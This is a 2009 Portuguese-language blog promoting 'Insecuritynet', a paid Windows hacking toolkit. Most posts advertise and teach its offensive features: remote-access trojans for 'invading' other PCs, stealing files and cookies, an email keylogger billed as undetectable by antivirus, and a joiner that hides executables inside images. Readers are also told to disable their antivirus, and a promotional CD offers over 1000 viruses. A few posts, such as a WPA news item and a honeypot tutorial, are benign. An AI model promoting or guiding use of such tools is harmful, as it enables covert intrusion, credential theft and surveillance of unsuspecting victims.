domingo, 6 de setembro de 2009

Download - SCAN de Erros Insecuritynet


Esta ferramenta faz um scan em seu PC a procura de softwares de segurança que podem interferir no funcionamento do programa insecuritynet.
Alguns softwares podem ser pausados e outros removidos.
Apenas para windows XP
Download

Download Display IP

Estava aqui brincando de matematica aplicada a programação.
Programei um Display para mostrar o IP, é legal...alem de capturar o endereço IP, precisa separar os valores e definir posição de caracter para cada valor.
Nem serve pra nada... só estudar programaçao mesmo.

Download



quarta-feira, 2 de setembro de 2009

Cientistas japoneses quebram criptografia WPA em poucos minutos

Os cientistas japoneses Toshihiro Ohigashi, da Universidade de Hiroshima e Masakaty Morii, da Universidade de Kobe, desenvolveram uma forma de quebrar a criptografia do tipo WPA (Wi-FI Protected Access), muito usada na proteção de roteadores de redes sem fio para manter a segurança.

Em questão de minutos, os pesquisadores conseguiram a façanha, apresentada no evento Joint Workshop on Information Security, sediado em Taiwan, há duas semanas. Mais detalhes serão apresentados em conferência no Japão, que deve acontecer no dia 24 de setembro.

Quem faz o ataque consegue ler tráfego criptografado em WPA, que circula em uma rede. Especialistas em segurança já tinham alertado para essa possibilidade em novembro do ano passado, mas os japoneses levaram a teoria à prática e mostraram que a quebra de segurança pode ocorrer em minutos.

Os sistemas de criptografia em roteadores sem fio têm um longo histórico de problemas. O sistema WEP (Wired Equivalent Privacy), lançado em 1997, foi quebrado poucos anos depois e hoje é considerado completamente inseguro.

Já existe, no entanto, alternativa para o WPA. É o WPA 2, que existe desde março de 2006. "Apesar da alternativa mais segura, ainda existe uma grande base instalada pelo mundo que não migrou para o novo sistema", afirma o diretor de marketing da organização Wi-Fi Alliance, Kelly Davis-Felner. A Wi-Fi Alliance é a entidade responsável por estabelecer padrões de redes sem fio para a indústria.

Para o CEO da empresa de segurançca Errata Security, Robert Graham, a nova prática de quebra de segurança não chega a ser um motivo de desespero, mas é preocupante. "Os softwares de segurança existentes no mercado são capazes de barrar esse ataque se o roteador não o fizer, mas a quebra da segurança é o suficiente para os profissionais de tecnologia dispensarem o sistema WPA", diz.

A alteração do tipo de segurança no roteador é simples e pode ser configurado por qualquer pessoa que tenha acesso administrativo à interface do equipamento.



FONTE:
http://pcworld.uol.com.br/noticias/2009/08/31/cientistas-japoneses-quebram-criptografia-wpa-em-poucos-minutos/



sábado, 1 de agosto de 2009

Video aula - Invasao PC - Backdoor 2.3




O video fala sobre a atualização do insecuritnet para a versão 2.3 (conexao reversa)

Tópicos abordados:
- Processo de criaçao do server
- Como conectar no PC infectado
- Baixar arquivos para seu computador
- Vizualizar todos os processos e conexões do PC infectado
- Criar um log com todos os dados do PC (incluindo os arquivos do usuario)
- Baixar cookies
- Enviar uma mensagem
- Floodar o desktop
- etc .....


PARTE_1
http://www.youtube.com/watch?v=eeywFOb_Fts
PARTE_2
http://www.youtube.com/watch?v=o5C4tw3M1e0
PARTE_3
http://www.youtube.com/watch?v=Ppx-I3QZpaA


Ou no blip tv (parte única):
http://insecuritynet.blip.tv/file/2405292/




sábado, 25 de julho de 2009

Insecuritynet 2.3 ja está disponível



Atualizaçao dos Trojans
- Os trojans de conexao reversa e direta possuem exatamente as mesmas funçoes, só muda a forma de conexao.
- Download de arquivos do PC infectado
(Baixa arquivo sem usar o navegador, com barra de status e estimtiva de tempo)
- Cria um Log de todo o sistema
(Salva nome de todos os progarmas abertos, sites conectados, dados do sistema e usuario, e os arquivos dos principais diretorios do windows, tudo isto em um único arquivo de texto)
- Envio de mensgens mais pratico
(agora voce não precisa mais digitar msg *)
- Exibe conexoes e processos do PC infectado
(Todos os processos ativos, da para saber quais programas estão abertos)
- Exibe a medias disponveis
(Voce sabe se o computador tem outras partiçoes no HD, CD do drive, pendrive, alem de saber voce tambem tem acesso a todas as medias)
- Exibe dados importantes do sistema
(Sistema operaciona, usuario, data de formataçao, itens de hardware etc..)

Tambem ja vem com os comandos prontos para os preguisos que não querem aprender a usar o prompt XD rsrsrs
-Reiniciar
-Desligar
-Enviar mensagem
-Flood Desktop
-Finalizar Programa
-Abrir Sites


Atualizaçao do Keylogger
Na versão anterior o keylogger gerava um log no PC infetado e este log ia ficando cada ves maior, em poucos dias o log estava enorme e vc recebia sempre o mesmo log mais com o final adicionado, as veses até não enviava mais por ele estar muito grande.
Na versão 2.3, o log é criado, a cada 200 carcteres digitados vc recebe um email.
Apos a CONFIRMAÇAO que este email foi enviado este log é deletedo e comessa a ser criado um outro log.
O log que voce recebe no email ja vem com data e hora da emissão.


Atualizaçao do Port Scan
Na versao anterior o port scan fazia uma tentativa de conexão em cada porta e só encerrava a temtatia qundo o servidor remoto enviava o timeout.
Nesta nova versão o timeout é definido pelo insecuritynet, se a porta não responder em 2000 ms ele ja define como timeout.
Isto deixa o Scan muito mais rapido, sem perder a eficiencia.

Testes para a versão demo:
Agora voce pode testar o trojan mesmo sem registrar o programa.
Basta entrar em:
INICIO --> Invasao e captura de dados --> Auto Infect
Entre em auto infectar/ remover
Escolha uma senha para voce não ficar vulneravel
a porta esta padronizada (15 )
Vc se auto infecta sem a necessida de criar o server, o programa mesmo faz o papel do server.
Depois entre em "conectar" digite seu IP e conecte ao trojan
Para tirar o server de seu PC entre em "infectar/ remover "
Nesta nova versão todas as ferramentas do trojan full estão disponiveis no auto infect para teste.
Se voce não estiver usando roteador ou rede privada, voce podera se auto infectar e enviar seu IP para outra pessoa conectar em sua makina.(voce deverá fornecer a senha que voce definiu)


Servidor HTTP
Agora voce pode Hospedar sites em seu proprio computador com o insecuritynet.
Basta voce ativar o servidor e salvar suas pagina na pasta mapeada pelo insecuritynet.
Esta opçao ja existia no versão anterior mais foi melhorada.
INICIO -> Ferramentas --> Servidor HTTP
A porta padrão é a 80 (porem alguns servidores de internet blokeiam, caso ist aconteça usa a 8082)

ON LINE (video aulas)

Logo no inicio do programa tem a opçao "On Line"
Estão todos os links oficiais do programa, fi adicionado um canal de videos:
www.insecuritynet.com/videos
Vc encontra todos os videos do insecurtynet (desde a versao 1.0)

Sobre o Registro
A parte de:
REGISTRAR --> Mais informações foi atualizada
Agora tem um FAC com as Dúvidas mais comuns
Para quem ja tem o programa registrado.
Remova a versão anterior e instale a nova versão.
O novo programa ja vai reconhecer que ele esta registrado, nem precisa digitar o serial novamente.
Caso aconteça algum erro na hora da instalaçao reinicie o PC e reisntale.

[Sofware atualizado para a versao 3.X]
Download:
http://www.insecuritynet.com,br


É isto ai, nos estamos trabalhando para sempre melhorar o programa.
Obrigado a todos que utilizam o programa (Demo ou Full).




segunda-feira, 20 de julho de 2009

Backdoor Conexao Direta (Burlar Firewall)




A Imagem é maior mas não cabe no blog, ampliem ai =)


Backdoor de Conexao Direta:

INICIO --> Invasao e captura de dados --> Trojan Normal

sábado, 11 de julho de 2009

[VIDEO] Como juntar dois arquivos - Joiner Insecuritynet

Joiner é uma ferramenta para juntas dois arquivos em apenas um, desta forma que seu executavel fique camuflado dentro de outro arquivo.
Existem muitos joiners disponiveis para download, o grande problema é que a grande maioria são detectados por anti-virus.
Muitas veses o antivirus não pega o virus que esta escondido mas pega o fato de ser um joiner conhecido.
Nesta video aula mostra como fazer isto com um joiner que alem de juntar os arquivos automaticamente ele encripta, e torna indectavel pela maioria dos anti-virus.
Este video é um exemplo de uma imagem sendo juntado com um executavel.

Video aula:
http://www.youtube.com/watch?v=j5BWT2NH7VE



segunda-feira, 6 de julho de 2009

Port Scanner


Este tópico é para o pessoal que esta iniciando nos estudos sobre segurança, vulnerabilidades. Vou falar sobre o Port Scan, uma ferramenta indispensavel para sua propria defesa e tambem para voce planejar um ataque.
Port Scanner é uma ferramentas usada para scannear um computador a procura de portas abertas.
Localizando uma porta aberta podemos saber qual serviço esta ativo na porta como por exemplo (FTP, HTTP, Telnet, SMTP etc )
Uma vez identificado o serviço voce poderá procurar vulnerabilidades, exploiters neste serviço para uma futura invasão.
Voce poderá encontrar até portas são abertas por trojans conhecidos.
Eu ja encontrei até porta aberta diretamente para a shell do sistema.
Com o portscan Insecuritynet, voce tem varias opçoes de scan. ( Principais Portas ou faixa de portas ) alem do scan o programa conecta, injeta script etc..

Olhem a imagem:


Até mais galera, bons estudos.



terça-feira, 23 de junho de 2009

Descontos especiais para turmas de cursos de Redes, Segurança e TI


Voce que estuda Redes, Segurança, TI ou informatica em geral e gostaria de compartihar o programa com seus colegas de turmas. Estamos oferencendo descontos especiais para turmas.
A versão 2.X do programa irá interessar varios estudantes do seu curso.
Nos da equipe gostariamos de apresentar o software a algum representante do seu curso.
(Poderá ser seu professor ou até voce mesmo)

Para entar em contato com nossa equipe acesse:
http://www.insecuritynet.com/contato.html

ou atraves do email:
suporte@insecuritynet.com

Existe muito material de estudo para sua turma no curso.
Abaixo segue dados sobre a nova versão do programa

Descriçao do programa

O software Insecuritynet permite voce a fazer varios testes de segurança em sua rede ou empresa. São testes de comuns de vulnerabilides em redes privadas , computadores pessoais, computadores clientes.A grande firença do programa é que alem dos testes técnicos, o software permite voce agir como um suposto “Craker” e colerar informações e conectar em computadores.
A grande maioria de furos de segurança não são apenas falhas tecnicas, mas sim de funcinarios sem nenhum tipo de treinamento quanto à segurança digital. Com o programa voce poderá faser testes de intrusão utilizando varios tipos de servers, scans, etc.
Resumindo, voce mesmo podera fazer testes de intrusão, com os mais variados métodos de invasão.
Outra vantgem em utilizar o Insecuritynet é sua segurança pessoal contra arquivos mal intencionados. O programa detecta qualquer executavel que utiliza internet em seu computador. O seu funcionamento é similar à um firewall, porem voce tem varios dados sobre o executavel e sua conexão.
Voce tambem obtem varios dados de sua rede, inclusive diretorios compartilhados desprotegidos.

Tutorial completo do programa:
http://www.insecuritynet.com/manual.rar

Lista de ferramentas:
Ferrametas para Invasão:
Invade um PC via trojan de conexao direta
Invade um PC via trojan de conexao reversa
Cria um trojan que irá te servir de proxy
Cria um trojan que redireciona sites
Cria um Keylogger que captura tudo o que for digitado e te envia por email
Captura IPs de Sites
Captura IP de usuarios do MSN
captura IPs de quem visualizar sua pagina, inclusive orkut

Ferramentas para Scan e conexão em um PC Remoto:
Ping ICMP grafico
Ping SYN em uma porta especifica
Exibe a rota entre seu PC e outro computador
Exibe as principais portas abertas em um PC remoto
IP SCAN onde voce define a faixa de portas
Verifica se uma porta TCP esta aberta
Verifica se uma porta UDP esta aberta
Injeta seu script em um Computador remoto
Conecta em computador atraves de uma porta TCP
Conecta em computador atraves de uma porta UDP
Faz um scan em um servidor FTP
Conecta em um servidor FTP
Conecta em um servidor FTP pelo explorer
Envia emails sem usar navegador
Visualiza emails sem usar navegador
"Pinga" sites que não respondem ao ping comum
Visualiza a resposta de um servidor HTTP
baixa arquivos da web
"Pinga" sites HTTPS que não respondem ao ping comum
Conecta em servidores TELNET
Exibe IPs online em sua rede ou em uma faixa de IP
Faz flood de pacotes ICMP
Cria um Chat direto com outro PC sem servidor externo

Ferramenatas para Rede:
Exibe todos os PCs conectados em sua rede
Exibe todos os compartilhamentos de sua rede
Exibe diretorios compartilhados de um PC da rede
Conecta em um diretorio compartilhado de sua rede
Exibe o horario do servidor da rede
Exibe a ID de classe DHCP de sua rede
Exibe estatisticas de seu PC
Exibe Diretorios de seu PC compartilhdos na rede
Exibe serviçoes de rede ativos em seu PC
Exibe Usuarios de seu PC com acesso a rede local
Exibe PCs conectados ao seu na rede
Exibe Impressoras compartilhadas
Exibe Servidor de internet da rede
Exibe Compartilhamentos desprotegidos sem senha em sua rede

Ferramentas para seu Computador:
Honeypot, simula uma falsa vulnerabilidade
Cria um servidor HTTP, hospede sites em seu PC
Redirecina seu PC para um servidor externo
Exibe toda sua configuração
Exibe portas TCP abertas
Exibe portas UDP abertas
Exibe portas abertas e os executaveis responsaveis
Exibe as portas que estão aguardando conexão
Exibe Dados de uma porta aberta conectada
Abre uma porta para shel CMD.exe
Abre uma porta e visuliza os dados enviados
Redireciona os dados de uma porta para outra porta
Exibe conexões TCP
Exibe conexões UDP
Exibe conexões do sistema
Numero de bytes enviados e recebidos
Exibe processos ativos
Localiza um processo atraves do PID
Cancela um processo atraves do nome ou PID
Visualiza a cache DNS
Limpa o cache DNS
Faz DNS Spoof
Captura tudo o que for digitado em seu computador e salva em um arquivo "Keylogger Local"
Visuliza dados importantes de seu sistema

Ferramentas para manupulaçao de arquivos:
Protege arquivos de Anti-Virus
Junta dois arquivos em um unico executavel
Compara dois arquivos

Video aulas e tutoriais

Inavsao de um Computador Pessoal (via conexao reversa)
http://www.youtube.com/watch?v=q1oW2_F-M6U

Como explorar um servidor FTP
http://blip.tv/file/2062116

Keylogger Insecuritynet
http://www.youtube.com/watch?v=2RGVgf-JH9A

Honeypot "Iscas para Hacker"
http://insecuritynet.blogspot.com/2009/05/honeypot-iscas-para-hackers.html

------------------------------------------
Download:
http://www.insecuritynet.com/download.html
Sistema operacinal: Windows XP
O codigo do programa esta protegido pelo themida, algums Anti-Virus pode detectar como virus.
Pause seu Anti-Virus antes de Instalar.
A senha para descompactar é: 1234

Contato
Para entar em contato com nossa equipe acesse:
http://www.insecuritynet.com/contato.html

ou atraves do email:
suporte@insecuritynet.com
_______________________________

Obrigado pela sua atenão.
Equipe Insecuritynet.



sábado, 13 de junho de 2009

Video Aula - Keylogger Insecuritynet 2.X

Este video mostra como configurar um keylogger utilizando o programa insecuritynet.
-Captura tudo o que for digitado e envia para seu email.
-Indetectavel pela maioria dos Anti-Virus
-Muito facio para configurar.



Link do Video:
http://www.youtube.com/watch?v=2RGVgf-JH9A






segunda-feira, 8 de junho de 2009

Para que serve o programa Insecuritynet ?


Muita gente me pergunta para que serve o insecuritynet.
A verdade é que o progama não tem uma função específica, mas sim várias funções reunidas em um único software.
Com ele voce pode invadir outro computador, monitorar seu PC, simular vulnerabilidades, fazer scan, até manipular arquivos e muitas outras coisas.
A melhor forma de explicar para que o programa serve, é descrever a função das ferramentas:

Ferrametas para Invasão:
Invade um PC via trojan de conexao direta
Invade um PC via trojan de conexao reversa
Cria um trojan que irá te servir de proxy
Cria um trojan que redireciona sites
Cria um Keylogger que captura tudo o que for digitado e te envia por email
Captura IPs de Sites
Captura IP de usuarios do MSN
captura IPs de quem visualizar sua pagina, inclusive orkut

Ferramentas para Scan e conexão em um PC Remoto:
Ping ICMP grafico
Ping SYN em uma porta especifica
Exibe a rota entre seu PC e outro computador
Exibe as principais portas abertas em um PC remoto
IP SCAN onde voce define a faixa de portas
Verifica se uma porta TCP esta aberta
Verifica se uma porta UDP esta aberta
Injeta seu script em um Computador remoto
Conecta em computador atraves de uma porta TCP
Conecta em computador atraves de uma porta UDP
Faz um scan em um servidor FTP
Conecta em um servidor FTP
Conecta em um servidor FTP pelo explorer
Envia emails sem usar navegador
Visualiza emails sem usar navegador
"Pinga" sites que não respondem ao ping comum
Visualiza a resposta de um servidor HTTP
baixa arquivos da web
"Pinga" sites HTTPS que não respondem ao ping comum
Conecta em servidores TELNET
Exibe IPs online em sua rede ou em uma faixa de IP
Faz flood de pacotes ICMP
Cria um Chat direto com outro PC sem servidor externo

Ferramenatas para Rede:
Exibe todos os PCs conectados em sua rede
Exibe todos os compartilhamentos de sua rede
Exibe diretorios compartilhados de um PC da rede
Conecta em um diretorio compartilhado de sua rede
Exibe o horario do servidor da rede
Exibe a ID de classe DHCP de sua rede
Exibe estatisticas de seu PC
Exibe Diretorios de seu PC compartilhdos na rede
Exibe serviçoes de rede ativos em seu PC
Exibe Usuarios de seu PC com acesso a rede local
Exibe PCs conectados ao seu na rede
Exibe Impressoras compartilhadas
Exibe Servidor de internet da rede
Exibe Compartilhamentos desprotegidos sem senha em sua rede

Ferramentas para seu Computador:
Honeypot, simula uma falsa vulnerabilidade
Cria um servidor HTTP, hospede sites em seu PC
Redirecina seu PC para um servidor externo
Exibe toda sua configuração
Exibe portas TCP abertas
Exibe portas UDP abertas
Exibe portas abertas e os executaveis responsaveis
Exibe as portas que estão aguardando conexão
Exibe Dados de uma porta aberta conectada
Abre uma porta para shel CMD.exe
Abre uma porta e visuliza os dados enviados
Redireciona os dados de uma porta para outra porta
Exibe conexões TCP
Exibe conexões UDP
Exibe conexões do sistema
Numero de bytes enviados e recebidos
Exibe processos ativos
Localiza um processo atraves do PID
Cancela um processo atraves do nome ou PID
Visualiza a cache DNS
Limpa o cache DNS
Faz DNS Spoof
Captura tudo o que for digitado em seu computador e salva em um arquivo "Keylogger Local"
Visuliza dados importantes de seu sistema

Ferramentas para manupulaçao de arquivos:
Protege arquivos de Anti-Virus
Junta dois arquivos em um unico executavel
Compara dois arquivos


Para quem ainda não conhece o programa, baixe somente no site oficial:
www.insecuritynet.com
A senha para descompactar é: 1234
O Download ja acompanha um manual em PDF













Versão 2.2 Disponivel


O insecuritynet 2.2 ja esta disponivel no site.
Aparentemente não existe diferença em relação ao 2.1, a unica diferença visivel é uma nova ferramenta para capturar IP de um usuario do MSN (Como o IPGET)
Mas foram feitas as seguintes atualizações:
- Mudanças da estrutura do programa que otimiza seu desempenho
- Menos consumo de RAM (deixa o programa mais leve)
- Novo setup
- O programa ja acompanha um manual em PDF com 136 paginas.
- Nova ferramenta para captura de IP de usuarios do MSN

Download:
http://www.insecuritynet.com/download.html

Lembrando que ninguem perderá registro com as atualizaões 2.X.
O registro não expira.



quinta-feira, 28 de maio de 2009

Honeypot “Iscas para hackers”


A tecnica de Honeypot é um tanto antiga, porem até hoje é muito utilizada para captura de hackers mal intencionados.Atualmente o Governo americano utiliza esta tecnicas em redes Wireless para estudar o comportamento destes “Hackers”
O conceito da tecnica é muito simples:
Voce simula uma vulnerabilidade, como uma isca para os “Hackers” se conectarem. Uma ves conectado voce obtem o IP e seus comandos.
Existem sofwares que criam uma falsa vulnerabilidade. Um deles é o Insecuritynet:
Observe a Imagem:


Estou conectado em uma suposta Shell do Comandos do Windows XP. Pela porta 23 (Telnet). Porem isto não passa de uma simulação.
As veses eu deixo a porta aberta para a Honeypot por incrivel que pareça em menos de meia hora alguem conecta. Ainda mais se estiver on-line no MSN rsrs.
Para criar a falsa vulnerabilidade com o insecuritynet entre em:
FERRAMENTAS -> FALSA SHELL
Esta ferramente permite voce usar uma tecnica antiga de simular uma vulnerabilidade em seu computador, ativando esta ferramenta voce simula uma porta de telnet aberta diretamente para shell do sistema. O insecuritynet abre a porta e simula um ambiente de shell de comando onde voce pode escolher o suposto nome do usuario e deixar uma mensagem para o “invasor”.
Primeiros vamos configurar a falsa vulnerabilidade.
Vamos definir o usuario com “Diretoria” e deixar uma mensagem (nao deixe espaços)



Enquanto esta pequena janela estiver aberta sua falsa shell estará aberta:


Agora vamos fazer o papel do suposto invasor.



Assim que o “invasor” conecta em seu computador aparecerá esta janela com os dados dele:


Vamos voltar ao suposto invasor.
Observe que parece um sistema windows real:



A pessoa pode visualizar o conteudo de arquivos:


Navegar pelo falso sistema:


Assim que o “invasor” tentar acessar um diretorio de sustema fora de seu suposto usuario sua mensagem será exibida:


Assim que ele desconectar ou voce fexar a falsa shell vai aparecer um alerta:


Como vimos no Honeypot do insecuritynet é possivel o “invasor” interagir com o falso sistema

By Rackerox
www.insecuritynet.com



domingo, 3 de maio de 2009

PROMOÇÃO REGISTRE O INSECURITYNET GANHE UM CD ROM

PROMOÇÂO ENCERRADA

Registrando o seu insecuritynet voce ganha inteiramente gratis um

CD ROM com mais de 400 softwares, o CD é inteiramente gratis inclusive o frete.
O CD contem varios programas para quem gosta do universo hacker.


Conteudo do CD:
Trojans Backdoors
Keyloggers
Redes/Internet
Bruteforces
IP Scans
Exploiters/Scans
Nuckers
Binders
Criptografia
Ferramentas de programação
Compiladores
Resource
Conversores
Compressores
Compactadores
Ferramentas para web
Ferramentas para windows
Programas para Msn/orkut
Mais de 1000 virus
Servidores
Clientes
Programas de Segurança
Ferramentas gerais
Análize e manutenção de sistema

Clique aqui para ver a previa do CD
Clique aqui para ver o conteudo detalhado do CD

IMPORTANTE:
O CD ROMé apenas um brinde, no CD não contem nada a respeito sobre o insecuritynet.
A promoção inicia no dia 04/05/2009 e termina no dia 01/06/2009

Se voce ainda não conhece o software insecuritynet acesse:
www.insecuritynet.com

Assista videos aulas sobre invasão de um computador Pessoal e como explorar um servidor.
http://www.insecuritynet.com/videos.html

Para registar o programa:
http://www.insecuritynet.com/registro.html

PROMOÇÂO ENCERRADA




sexta-feira, 1 de maio de 2009

Como explorar um servidor FTP

Este video mostra como explorar um servidor FTP com o software Insecuritynet. No video tem um servidor da NASA de exemplo, é um diretorio publico, não confunda com invasão. Para baixar o programa acesse: www.insecuritynet.com

Para assistir o video clique aqui



Novo site no ar



O site do insecuritynet teve o layout atualizado.
No site tambem será postado, todos os videos e tutoriais.
www.insecuritynet.com



quinta-feira, 23 de abril de 2009

Video aula (Invasao via conexao reversa)



Este video mostra passo a passo como criar, configurar e conectar em um trojan de conexao reversa do software Insecuritynet 2.1.

Importante: Para realizar uma conexao reversa voce não pode estar dentro de uma rede privada, ou estar atrás de um roteador.

Para baixar o software acesse:
www.insecuritynet.com

Para assistir o video clique aqui



terça-feira, 21 de abril de 2009

Funções abertas na versao DEMO


Vou postar as funçoes disponiveis na versao DEMO:


Toda configuracao TCP IP
Visualize seu IP, MAC, servidor DNS, etc..

Visulaizar portas TCP Abertas

Todas as portas TCPs abertas em seu computador

Visulaizar portas em estado de escuta

Portas de seu coputador que estão aguardando uma conexao

Abrir uma porta para shell de comandos

Abre uma porta do seu computador (Cuidado pois qualquer pessoa pode ter acesso ao seu sistema)
Visualizar conexoes TCP
Todas as conexoes ativas em seu computador

Estatisticas das conexoes

Numero de bytes enviados e recibidos separados por protocolo
Visualizar processos
Todos os processos ativos em seu computador

Cancelar processo

Cancela um processo
Visulizar cache DNS Local
Visualiza todo o cahe DNS de seu computador (É util para detectar DNS Spoof)

Limpar cache DNS Local

Limpa qualquer tentativa de spoof de seu cache DNS
Keylogger Local
Grava tudo o que for digitado em seu computador e salva em um arquivo de texto

Dados do Sistema

Obtem dados importantes de seu computador

Capturar Ip por endereço DNS

Digite o nome do host ou endereço do site e é retornado o IP

Exibir todos os computadores de uma rede

Lista todos os computadores conectados em sua rede privada

Cliente ftp (windows)

Conecta em servidores ftp via console

Cliente SMTP

Envia email via promtp de comando com autenticação

HTTP Ping

Ping só a porta 80 com pacote syn (útil para servidores que não aceitam ping

Simulador de navegador

útil para pegar dads do servidor HTTP

Cliente telnet do windows

Conecte a outros computadores via telnet

Nuker
Flood de ping do windows

Bloqueio de processo em um determinado IP

Bloqueia qualquer programa que usar um IP determinado por voce

Comparador de arquivos

Compara se dois arquivos são iguais, útil para detectar programas "joinados"

Chat

Conversar com outra pessoa que possui o insecuritynet

Auto Infect (trojan)

Esta função foi feita para testes, voce se infecta com um trojan e conecta, voce pode configurar uma senha para ninguem ter acesso a seu computador.



terça-feira, 14 de abril de 2009

Encontrada vulnerabilidade no firefox 3.0.5



O firefox permite voce criar um link com um endereço que na verdade é redirecionado para outro.
Até ai tudo bem, é só um hiperlink, mas...
O endereço falso tambem aparece na barra de status.

Creditos: http://www.milw0rm.com

***********************************************
CODE
***********************************************
Clique aqui (Apenas para quem usa o firefox 3.0.5)
***********************************************



sábado, 11 de abril de 2009

Versao 2.1 ja esta disponivel



Aparentemente parace igual a 2.0, mas foram alterados algums itens


- Trojan de teste embutido na versão demo.
- Resolvidos problemas com o firewall
- Resolvidos alguns Bugs de entrada de dados
- Joiner e AV potect melhrados
- Melhorias na estrutura do programa.

Download:
http://www.insecuritynet.com/Download.html



quarta-feira, 8 de abril de 2009

Forum Insecuritynet



Nem sempre o msn (insecuritynet@hotmail.com) esta on-line.
Qualquer duvida em relação ao insecuritynet poder ser respondida tambem através do forum.

http://forum.insecuritynet.com/



Tutorial Trojan Normal



Apresentação de Slides sobre como criar, configurar e conectar no trojan Backdoor da versão 2.0 do insecuritynet

Download:
clike aki



sábado, 28 de março de 2009

Download da versao 2.0 disponivel


O download da versao 2.0 ja esta disponivel

Gostaria de agradecer as pessoas por apoiarem o insecuritynet, pelas dicas, sugestões e críticas.
Demorou um pouco mas ficou pronto.
Desculpem pela demora, eu estava sem tempo mesmo, e durante a faze de programação fui tendo novas ideias. O programa era para ser mais simples, mas acabei criando mais funções.

Novidades do programa em relacao ao 1.1
- A versao 1.1 tinha 27 megas, a nova versao (2.0) tem apenas 5 megas porem muito mais funçoes.O software ficou mais leve.
- Ficou mais facio navegar pelo programa, voce usa as teclas “UP e DOW” (setas), os menus são organizados como subdiretorios
- Visual melhorado com cores distintas.
- Registo muito mais simples

NOVAS FUNÇOES
Sao muitas vou citar apenas algumas:

- Gerenciamento total de suas portas, processos e conexoes

- Ping, Ping de porta, Port scan, teste de portas (com graficos)

- FTP SCAN (Faz um scan completo em um servidor FTP)

- Cliente SMTP, Simulacao de navegador, Download de arquivos

- Trojan Backdoor Insecuritynet (Com opcao de porta e senha de conexao)

Trojan Backdoor(Conexao reversa) (com opcao de porta)

Trojan de ponte (Torna o PC infectado um “proxy” para voce esconder seu IP)

Trojan de DNS Spoof (Redirecio um dominio para um IP definido por voce)

(Os trojan tem monitoramento com alerta de server on line)

Keylogger via email (Captura tudo o que for digitado e envia por email)

Vacina par todos os trojan e keylogger

AV protect (criptografe seus arquivos, proteja de antivirus, nao precisa de decripter, basta apenas abrir o arquivo que ele é decriptografado automaticamente)

Joiner (junte dois arquivos em um unico executavel com varias opções de icones)

Capturar IP por endereþo DNS

Capturar IP por Novas conexoes (Captura todos os IP de novas conexoes, util para capturar IP pelo MSN)

Capturar IP por XSS (Insira um link em sua pagina, quem entrar na pagina te enviará dados como: IP, Navegador e Sistema operacional, funciona no Orkut)

Gerenciamento total de sua rede privada (Inclusive captura de compartilhamento sem senhas)

Ping por faixa de IP (Capture todos os IP online em uma rede)

Falsa Shell (Crie uma falsa vulnerabilidade de telnet, O ambiente falso permite que vode deixe uma mensagem e um falso nome de usuario)

Servidor HTTP (Hospede sua paginas e arquivos em seu proprio computador)

Proxy CMD Local (torne seu PC uma proxy via linah de comando com IP e porta definidos)

Comparador de aquivos (cmpara diferençãs ente dois arquivos)

Anti badcom (Procura por scripts de lotes maliciosos)

Monitor de novas conexoes

Alerta de processos TCP (Exibe todos os executaves que utilizam a internet, voce pode criar uma lista de executaveis confiaves, caso algum não confiaves esteja ativo é exibido um alerta com nome, processo, porta e endereço do executavel)

Bloqueio de processos em uma porta, IP ou DNS

Visualizaçao de portas em estado de escuta

Chat Insecuritynet , caso algum dos PCs caia da internet ele tenta reconectar altomaticamente.


É isto ai galera, espero que gostem e aproveitam o software para estudar bastante.

Rackerox

DOWNLOAD:
http://www.insecuritynet.com/Download20.html
(Baixe apenas deste link)

Insecuritynet 2.0 Disponivel





domingo, 1 de fevereiro de 2009

Antigo Site Hall of Hackers


Galera, lembrei de um antigo site meu, foi meu primeiro site.
Alguém deve lembrar da comunidade Hall of Hackers (excluída pelo orkut)
Eu fiz o site linkado com o orkut, mas nunca atualizei.
Tem algumas coisas interessantes que ainda funciona no site:
-Downloads
-Programas
-Editor de HTML on line
-Proxy
-Gerador de Senhas Randômicas
-Gerador de links disfaçados
-Gerador de CPF e CNJP
-Dicas de leitura
-Dicionário
-Etc..

Já vou avisando que o site nunca foi atualizado =).

O Dominio expirou, ai coloquei como subdominio do webexploiter.
http://www.hallofhackers.webexploiter.com/



terça-feira, 20 de janeiro de 2009

Insecuritynet 2.0 (Breve nova versão)


Galera, estou programando a nova versão do Insecuritynet.
De suas sugestões, o que pode melhorar, novidades que você queria nesta nova versão. Comente aqui neste tópico mesmo.

Vou falar algumas características desta nova versão:
  • Tem muito mais funções
  • Mais leve
  • Registro mais simples
  • Trojans mais leves e mais eficientes
  • O software contem uma vacina para quem se contaminar (assim você poderá fazer testes sem problemas)
  • Esta nova versão possuirá keylogger.
  • Monitoramento de suas portas e conexões.